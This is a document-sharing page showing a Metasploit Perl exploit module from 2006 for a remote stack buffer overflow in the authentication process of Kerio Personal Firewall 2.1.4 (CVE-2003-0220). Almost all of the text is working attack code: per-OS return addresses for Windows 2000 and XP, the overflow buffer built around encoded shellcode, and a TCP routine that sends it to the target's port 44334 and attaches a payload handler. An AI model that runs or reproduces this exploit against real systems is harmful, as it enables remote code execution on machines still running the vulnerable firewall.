Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow

VIEWS: 36 PAGES: 3

									                       Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow                     Page 1/3
     1    ##
     2    # This file is part of the Metasploit Framework and may be redistributed
     3    # according to the licenses defined in the Authors field below. In the
     4    # case of an unknown or missing license, this file defaults to the same
     5    # license as the core Framework (dual GPLv2 and Artistic). The latest
     6    # version of the Framework can always be obtained from metasploit.com.
     7    ##
     8
     9    package Msf::Exploit::kerio_auth;
     10   use base "Msf::Exploit";
     11   use strict;
     12   use Pex::Text;
     13
     14   my $advanced = { };
     15
     16   my $info =
     17     {
     18
     19          ’Name’ => ’Kerio Personal Firewall 2 (2.1.4) Remote Authentication Packet Buffer Overflow’,
     20          ’Version’ => ’$Revision: 1.1 $’,
     21          ’Authors’ => [ ’y0 [at] w00t−shell.net’, ],
     22          ’Arch’ => [ ’x86’ ],
     23          ’OS’      => [ ’win32’, ’win2000’, ’winxp’, ],
     24          ’Priv’ => 0,
     25          ’UserOpts’ => {
     26                    ’RHOST’ => [1, ’ADDR’, ’The target address’],
     27                    ’RPORT’ => [1, ’PORT’, ’The target port’, 44334],
     28                    ’SSL’     => [0, ’BOOL’, ’Use SSL’],
     29            },
     30          ’AutoOpts’ => { ’EXITFUNC’ => ’process’ },
     31          ’Payload’ => {
     32                    ’Space’       => 1000,
     33                    ’BadChars’ => "\x00",
     34                    ’Prepend’    => "\x81\xc4\x54\xf2\xff\xff",
     35                    ’Keys’        => [’−ws2ord’],
     36            },
     37
     38           ’Description’ => Pex::Text::Freeform(qq{
     39           This module exploits a stack overflow in Kerio Personal Firewall
     40   administration authentication process. This module has only been tested
     41   against Kerio Personal Firewall 2 2.1.4.
     42   }),
     43
     44           ’Refs’   => [
     45                     [’BID’, ’7180’],
     46                     [’CVE’, ’2003−0220’],
     47                     [’URL’, ’http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10’],
     48             ],
     49
     50          ’Targets’ => [
     51                    [’Windows 2000 Pro SP4 English’, 0x7c2ec68b],
     52                    [’Windows XP Pro SP0 English’,    0x77e3171b],
y0                                                                                                             02/28/2006
                         Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow                           Page 2/3
     53                       [’Windows XP Pro SP1 English’,    0x77dc5527],
     54                  ],
     55
     56             ’Keys’ => [’firewall’],
     57
     58             ’DisclosureDate’ => ’Apr 28 2003’,
     59
     60        };
     61
     62    sub new {
     63            my $class = shift;
     64            my $self = $class−>SUPER::new({’Info’ => $info, ’Advanced’ => $advanced}, @_);
     65            return($self);
     66    }
     67
     68    sub Exploit
     69    {
     70            my    $self = shift;
     71            my    $target_host = $self−>GetVar(’RHOST’);
     72            my    $target_port = $self−>GetVar(’RPORT’);
     73            my    $target_idx = $self−>GetVar(’TARGET’);
     74            my    $shellcode   = $self−>GetVar(’EncodedPayload’)−>Payload;
     75            my    $target = $self−>Targets−>[$target_idx];
     76
     77             if (! $self−>InitNops(128)) {
     78                     $self−>PrintLine("[*] Failed to initialize the nop module.");
     79                     return;
     80             }
     81
     82             my $sploit =
     83               Pex::Text::AlphaNumText(4268). $shellcode.
     84               pack(’V’, $target−>[1]). "\xe9\x0b\xfe\xff\xff";
     85
     86             $self−>PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target−>[0], $target−>[1]));
     87
     88             my $s = Msf::Socket::Tcp−>new
     89               (
     90                     ’PeerAddr’ => $target_host,
     91                     ’PeerPort’ => $target_port,
     92                     ’LocalPort’ => $self−>GetVar(’CPORT’),
     93                     ’SSL’         => $self−>GetVar(’SSL’),
     94               );
     95             if ($s−>IsError) {
     96                     $self−>PrintLine(’[*] Error creating socket: ’ . $s−>GetError);
     97                     return;
     98             }
     99
     100            $s−>Send($sploit);
     101            $self−>Handler($s);
     102            $s−>Close();
     103            return;
     104   }
y0                                                                                                                     02/28/2006
                     Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow   Page 3/3
     105
     106   1;
     107
     108   # milw0rm.com [2006−02−28]




y0                                                                                         02/28/2006

								
To top